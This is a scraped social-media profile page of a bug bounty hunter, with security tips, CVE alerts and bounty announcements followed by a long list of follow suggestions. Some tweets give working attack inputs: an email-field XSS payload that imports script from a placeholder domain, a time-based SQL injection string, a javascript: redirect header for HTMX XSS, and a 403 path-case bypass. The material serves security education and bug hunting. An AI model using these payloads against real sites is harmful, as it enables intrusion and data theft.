✌️Z4Z4✌️ @z4z4_h1
Full-time Bug Bounty Hunter since 2020 🐞💻 | Exploring the digital wilderness for glitches & vulnerabilities. Passionate about cybersecurity, ethical hacking Joined October 2009-
Tweets40
-
Followers44
-
Following466
-
Likes104
🚨Alert🚨CVE-2024-4439: Unauthenticated Stored Cross-Site Scripting Vulnerability in WordPress Core ⚠It can be exploited by both unauthenticated and authenticated users under varying circumstances and be leveraged to inject malicious web scripts into pages. 🤖Affected Versions:…
Talked a LOT about HTMX this week. So here's the TL;DR of the bypasses from the episode with @avlidienbrunn: 1. CSP Bypass 2. Client-side response header injection to XSS 3. Bypassing hx-disable 4. XSS-ing impossible elements
Andreas Konstantinides: Cybersecurity 101 - Κερδίστε το κορυφαίο βιβλίο κυβερνοασφάλειας #shorts #cybersecurity #cybersecurity2024
🔍 Hey, bug hunters! Ever tried slicing a big network into bite-sized pieces? Let's dive into how `mapcidr` makes this super easy! 🚀 Example time! We've got `136.122.0.0/16` and want to split it into smaller subnets, each with 2048 IPs. Just use `mapcidr -sbh 2048`, and bam!…
HTMX uses certain headers to help instruct the framework for certain behaviours. This can be abused via HX-Redirect: javascript:alert(1) for XSS if you can inject a response header. @avlidienbrunn explains how...
Understanding the Same-Origin Policy: A Friendly Guide for Bug Hunters 🕵️♂️ Hey there, tech enthusiasts and bug hunters! Have you ever stumbled upon the term "Same-Origin Policy" (SOP) while diving into the depths of web security? If it sounds a bit cryptic, don't worry! Let's…
🔥Exactly bro Exactly 👌
HackerOne CEO @martenmickos is retiring from HackerOne after 9 years of leadership. Read more here: bit.ly/4bBvqFl
Hey there, tech enthusiasts! 🌟 Let's dive into the tricky world of Cross-Site Request Forgery, or CSRF, a sneaky vulnerability that can trick a web browser into executing unwanted actions on a website where a user is logged in. 🕵️♂️ Ready to find out how to spot and…
Let me show you how to use the generative AI models built into Postman to quickly build tests to check for vulnerabilities in the APIs you are testing. #apihacking #apisecurity #postman danaepp.com/api-security-t…
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@YourDomain .com cc @BRuteLogic - brutelogic.com.br/blog/xss-limit…
From beer brewing to bug hunting! Check out @cinzinga_'s Hacker Spotlight! Cheers 🍻👇 loom.ly/NHukNG4
🔐 Unveiling SQL Injection: Discover the 3 Dangerous Types! 📬🕶📡 1. In-band SQLi In-band SQL Injection is the most straightforward and common form of SQLi. It's easy to detect and exploit because it involves using the same communication channel to launch the attack and gather…
🌐 Dive into the murky waters of SQL Injection (SQLi), a notorious vulnerability that can give attackers the keys to the database kingdom! 🗝 Learn the types and tactics: 📬 In-band SQLi: Direct data theft. 🕶 Blind SQLi: Stealthy and inferential. 📡 Out-of-band SQLi: Uses…
Hey there, fellow bug hunters! 🕵️♂️ Ready to level up your report writing skills? This tweet is all about crafting killer bug bounty reports that not only get noticed but also appreciated by program owners. Let’s dive in! 🚀 Writing a bug bounty report is like telling a story…
Η πατρίδα μου 😍 #greece
Valerie Mackiewicz @MackiewValer
33 Followers 5K FollowingRaheel Hasan @theraheelhasan
39K Followers 24K Following CEO, 1App. Instant access to mobile apps on any platform via edge computing. Angel investor. I tweet about startups, VC, AI, cloud computing, crypto, & gaming.Brittany Pierzchala @BrittanyPi43134
84 Followers 5K FollowingSecureYourBytes @secureyourbytes
117 Followers 1K Following .....::::: Siber Güvenlik ve Adli Bilişimin buluşma noktası ::::.....Ashad @ashadahmed_
4K Followers 3K Following DevOps @Nokia | AI Evangelist & Critic | Tech & Life | Opinions are Mine, Memes aren't ⚠Khaled Ebrahem 🖤�.. @Khaled_Ebrahem7
2K Followers 2K Following Joker🖤👑 FCIS||MU lvl4 |CS Department|👨🏻💻❤️Ali Osman Delişmen @aliosmandev
565 Followers 892 Following Software Developer @birdeftercom, creator of https://t.co/FSvXqDhBTl & https://t.co/5yPRys3nf1Juana Dario @jua_dario
81 Followers 5K FollowingVinayak Agrawal @Uchiha__Vin
439 Followers 675 Following Security Analyst Intern at @code_armor | SpeedCuber | Potterhead⚯͛ | Uchiha | Hokage. | eJPT | CEH Practical | CRTPLawanna Youngman @LawanYoungm
76 Followers 5K FollowingEmilia Barnes @hall_ameli34232
11 Followers 737 FollowingSaundra Avenia @SaundAven
33 Followers 5K FollowingCarolCarroll @4dt8SE1y04N68
10 Followers 253 FollowingIsla-rose Spohn @IslaSpohn52876
90 Followers 5K Followingmehrab opi🇧🇩 @mehrab_opi33500
795 Followers 2K Following Web Application Security Engineer | Bug Hunter | Ethical Hacker | Penetration TesterBelinda Haybarger @BelindaH86561
68 Followers 5K FollowingBlacksolo , Sp00f3dBy.. @MBlacksolo
563 Followers 846 Following Security Researcher , Bughunter, Student.zakurag1 @10janka
251 Followers 1K Following bug bounty Hunter, https://t.co/m7cH2QORHx https://t.co/Tuhw3RuZKg https://t.co/z99KeHdxRz security researcher, I love Coffe Chile siemens Hall of Thanks 2023Valeria Indelicato @ValeriaInd21087
76 Followers 5K FollowingKelsey Bialik @BialiKels
34 Followers 5K FollowingStacie Ratzloff @RatzloffSt71272
81 Followers 5K FollowingEllie-mae Sluss @SlusEllie
69 Followers 5K FollowingMabel Mangels @MangelsMab565
74 Followers 5K FollowingLupita Piel @PieLupi
81 Followers 5K FollowingAnitra Falk @fal_ani
82 Followers 5K FollowingRenita Welby @ReniWelb
46 Followers 5K FollowingJaelynn Bigbee @JBigbee87787
56 Followers 5K FollowingMagali Orlandi @MagaliOrla8662
95 Followers 5K FollowingEdwina Walker @EdwinaWindoww
594 Followers 1K FollowingEirwen Williams @williams_eirwen
2K Followers 2K FollowingHome Decor Heaven @Settingforrooms
551 Followers 1K Following A daily dose of inspiration to transform your space into a cozy and inviting retreat. Daily Amazon links with over 4.5 ⭐ and 🆙Samantha Chisholm @Samanthsamm1
850 Followers 1K FollowingLynn Hamon @LynnHamon1
2K Followers 3K Followingerikamae_008 @erikamae_008
15 Followers 353 FollowingBSidesSF @BSidesSF
6K Followers 421 Following Security BSides San Francisco — Join us May 4-5, 2024!DigitalOcean @digitalocean
225K Followers 2K Following DigitalOcean (NYSE: $DOCN) is the easiest ☁️ platform to deploy, manage & scale applications of any size. Status: @DOstatus Support: https://t.co/5gkvyinPlKZach Hamed @zmh
8K Followers 5K Following Co-founder of @ClayHQ. Previously product lead at @GoldmanSachs, Forbes 30 Under 30, @Harvard CS. Native New YorkerTim Medin 🇺🇦�.. @TimMedin
17K Followers 566 Following Kerberoast Guy • @RedSiege CEO • Forbes Tech Council • SANS 560 Author, Senior Instructor • IANS Faculty • Packers owner • Work Req: https://t.co/ALJldLMDfZchristina @cszhu
19K Followers 999 Following developer relations manager @Visier, but also speaker + engineer! 🌻 previously @Retool @SquareDev @Amazon @hackNY 🌻 co-founder @hack_davisJust Another Nerd @NicoleBeckwith
41K Followers 8K Following Manager, Threat Operations @kroger 🍓 Intel, Hunting, Detection Engineering, Insider Risk & Fraud. 💻 Fmr LE & DFIR for OH & Secret Service TF. ✝️ #FSD𝗛𝟯𝗞𝗧l𝗖 @H3KTlC
43K Followers 2K Following #infosec engineer | all things gaming | void hunter | will shitpost | i like to lift weights & play piano | los angeleno currently in twin cities | fight on✌️Kat 2fragz Cosgrove @Dixie3Flatline
36K Followers 614 Following Lead Open Source Advocate @ Dell. K8s Release Team Subproject Lead. Harbinger of K8s Deprecations, Uwubernetes Lead. bsky: @kat.lol She/they.Chloe Condon @ChloeCondon
58K Followers 8K Following Developer Advocate @Google ☁️ & recovering musical theatre girl 👩💻🎭🎶 prev: @Microsoft 📎 Former child, current meme sommelier ✨🖼️sysengineer @_sysengineer
24K Followers 997 Following Meme maker | Software Developer / Systems Engineer depends on the day | Opinions are mine | @sysengineer on TikTok | she/herSentinelOne @SentinelOne
52K Followers 1K Following ONE autonomous platform to prevent, detect, respond, and hunt. Do more, save time, secure your enterprise: https://t.co/N75g1HAnCs 🐱💻OccupytheWeb @three_cube
219K Followers 4K Following Pentester, Forensic investigator, and former college professor. Trained hackers at every branch of US military and intelligence. Visit me at https://t.co/G478wufszwLetsDefend @LetsDefendIO
90K Followers 0 Following LetsDefend is a hands-on Blue Team training platform that enables people to gain practical experience by investigating real cyber attacks inside a simulated SOCMichael Koczwara @MichalKoczwara
18K Followers 2K Following Founder @Intel_Ops_io Threat Intelligence, Adversary Infrastructure Hunting, Curated TI Feed (Coming Soon) https://t.co/vixTz8xKuF https://t.co/VQWaze6gaFvx-underground @vxunderground
293K Followers 212 Following The largest collection of malware source code, samples, and papers on the internet. Password: infected0xor0ne @0xor0ne
56K Followers 526 Following | CyberSecurity | Reverse Engineering | C and Rust | Exploit | Linux kernel | PhD | My Tweets, My Opinions :) |mRr3b00t @UK_Daniel_Card
93K Followers 7K Following 真理的揭露者 Quis custodiet ipsos custodes fella in cyberspace #nafo undercover #FVEY Lovely Horse #fella #meme #farm #appreciator #cyber #specialistClandestine @akaclandestine
36K Followers 5K Following | Security | Osint | Threat Research | Opsec | Threat Intelligence | Infosec | Threat Hunting |GuidedHacking @GuidedHacking
37K Followers 328 Following Reverse Engineering, Game Hacking, Malware Analysis & Exploit Development @ https://t.co/Dl5ED4o7YSResecurity® @RESecurity
4K Followers 1K Following We provide technology that empowers organizations to reimagine cybersecurity & protect what matters #SaaS #DigitalRiskManagement #CyberThreatIntelligenceSecNews @SecNews_GR
7K Followers 1K Following Follow us for the latest #security news, highlights and trends in the IT industry. Interested in #hacking, #attacks & #investigations. Contact us using #secnewszeynep. @itmakesensei
6K Followers 279 Following software engineer · Bilkent University · personal opinions about stuffs in tr | enCem ASLAN @cem_aslan08
856 Followers 717 Following Full Stack Developer 15 Years @coontechnology Co-FounderBurak Çankaya @burakcankaya07
16K Followers 412 Following Founder @gelecekbilimde • MsC Electrical & Electronics Eng. • ScienceComm • Agnostic-Rationalist • PM • Danışmanlık & Eğitim: https://t.co/nEHLNJOkiUOrhun Parmaksız 👾 @orhunp_
3K Followers 944 Following Building the future of the terminal 🦀 @ratatui_rs Beautifying your changelogs ⛰ @git_cliff 📦 I package stuff for @archlinux btw 🐘 @[email protected]sedat kapanoğlu @esesci
125K Followers 1K Following author of @street_coder · founder of @sozluk · ex-@microsoft · blog/bluesky: https://t.co/9k9eO1u8YV · https://t.co/GNELdjDuah · [email protected] · mastodon: @[email protected]Hüseyin @HuseyinAltns
125 Followers 94 Following Security Operations Center Analyst | Cyber Threat Intelligence Analyst | External Attack Surface Management AnalystAWS Cloud Security We.. @awscloudsec
40 Followers 4 Following https://t.co/xroKtuJ7Ja is a FREE weekly newsletter for cloud security professionals. #aws #cloudsec #cloudsecurity #security #cybersecuritySena Yakut @sena_yakutt
425 Followers 110 Following ☁️🛡️🚀 AWS Security Hero | ❤️ Securing the future.Ozan Sihay @ozan_sihay
30K Followers 1K Following Dijital İçerik Üreticisi / Eğitmen https://t.co/J0EEXjrxkZLogitech G @LogitechG
927K Followers 2K Following Probably tweeted that while in queue. https://t.co/kY6LVg6u8vSecureYourBytes @secureyourbytes
117 Followers 1K Following .....::::: Siber Güvenlik ve Adli Bilişimin buluşma noktası ::::.....Tarık — Ytbe.one @MikroYazilimci
363 Followers 193 Following Web developer 👨💻 | #IndieHacker | Founder of https://t.co/3hPbafZlIj ⚡| #BuildinPublic | 📩 [email protected]AWS Community Nordics @awsnordics
342 Followers 102 Following We are the ever-growing community of AWS users in the Nordics. Join our slack: https://t.co/VRmLNEJJAPBARAN @baranymo
7K Followers 138 Following Once you pushed your limits then you know your limits | I develop on rails with RubyFloerer @bug_dutch
2K Followers 342 Following Bug Bounty Hunter - CS Student - 🇳🇱 - MVH #1337UP0622 - https://t.co/JmznWlXSwm - https://t.co/IMspfhkMrYshmoul @shm0ul
508 Followers 84 Following 20 year old bug bounty hunter & security researcher from FinlandF1ras Fatnassi @Fatnass1F1ras
1K Followers 951 Following running, crypto, security (MSRC MVR 2022 & 2023)TESS @ArmanSameer95
6K Followers 819 Following Application Security Researcher https://t.co/g0QPLb24tI | https://t.co/XuUMBUWl0x | Most Valuable Hacker 2022 thanks to @bugcrowd | ex @pdiscoveryioStan🦉 @StanFaas
3K Followers 237 Following Dad - hacker - bug bounty hunter (gangstersquad) - bass music loverOlivia Gallucci ✨ @OliviaGalluccii
4K Followers 645 Following Offensive Security @ Apple 👩💻 | Free(dom) and Open Source advocate #FOSS 💞 | RIT 2025 | She/Her | Opinions ≠ Employer ⚠🚨Alert🚨CVE-2024-4439: Unauthenticated Stored Cross-Site Scripting Vulnerability in WordPress Core ⚠It can be exploited by both unauthenticated and authenticated users under varying circumstances and be leveraged to inject malicious web scripts into pages. 🤖Affected Versions:…
🔥Amazing Resource for Bug Hunters Link: kathan19.gitbook.io/howtohunt #bug #bugbounty #bugbountytips #cybersecurity
Vulnerability checklist: 📓⚔️ This repository contains a lot of web and API vulnerability checklist, a lot of vulnerability ideas, and tips from twitter - github.com/Az0x7/vulnerab… #infosec #cybersec #bugbountytips
Starting in 35 min!
Anyone interested in more impromptu parts of The Bug Hunters Methodology Live course today at the bug bounty village? @BSidesSF ? Tbhmlive.com
Sql Injection Payload : -10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z Credit:@lu3ky13 #BugBountytips #BugBounty
XSS filter bypass using : "JSFuck" #BugBounty #BugBountytips #togetherwehitharder
Today I have found 10+ CORS misconfiguration in 2 websites with valid Video POC and screenshot also. 3 reported. I used an automatic tool and then I checked manually for Video POC. A special thanks for my friend and supportive @coffinxp7 #BugBounty #hackers
Yay, I was awarded a $32,000 bounty on @Hacker0x01! hackerone.com/ismailsenturk Auth Bypass , SQLI , Idor , SSRF+RCE #TogetherWeHitHarder
Was able to escalate this to a 0 click!! Glory to God, I was awarded $20,000 for my report on @Hacker0x01 . Would do a writeup soon. Never give up fellow noobs💪🏾 #BugBounty #hackerone
#bugbounty #hackerone Program: This is an intended behavior not a big. Me: Lets disclose this intended behavior to the public👀 Program:
Andreas Konstantinides: Cybersecurity 101 - Κερδίστε το κορυφαίο βιβλίο κυβερνοασφάλειας #shorts #cybersecurity #cybersecurity2024
HTMX uses certain headers to help instruct the framework for certain behaviours. This can be abused via HX-Redirect: javascript:alert(1) for XSS if you can inject a response header. @avlidienbrunn explains how...
Starting my 1st Amtrak commute to BSIDES SF and RSA, I hope the wifi at least works a bit. Guess I can catch up on some portswigger labs and listen to @ctbbpodcast podcast on the way. If youll be out there, hit me up!
The production quality is top notch: youtu.be/iIguwAIYDKQ very well done @Hacker0x01! pps: I was there for the first LHE ever (Thanks to @fransrosen for inviting me and also helping me scoring my first huge bounty. What a legend.)
Some of us are building from SCRATCH. No inheritance, no connections, no backups. Just blood, sweat and skills. 🔥
Hey everyone! I've giving away a student pass for @BSidesMumbai ! Want it? Drop a comment telling why you need it. Let's make sure this opportunity goes to someone who's really psyched about #cybersecurity! #BSidesMumbai (You need to have a valid and original College ID)
Today @Bugcrowd, we're expanding our product line to offer VDP's for free bugcrowd.com/blog/introduci…, marking the next evolution of our VDP product, following our removal of incentives some time back. This marks a change in the industry, providing a no cost entry point for…
sometimes if u trying to access an endpoint and get 403 try this /api/docs/index.html ==> 403 Forbidden /api/Docs/index.html ==> 200 Ok I think it's called "Case Insensitivity Vulnerability" #bugbountytips #bugbounty #cybersecurity #Pentesting
This time our developer was fully assured that no XSS vulnerability would exist here! He developed a highly advanced filter bypass that allegedly prevents all XSS vulnerabilities and only allows his users to inject basic HTML tags! 😎 Can you prove him wrong? 🤔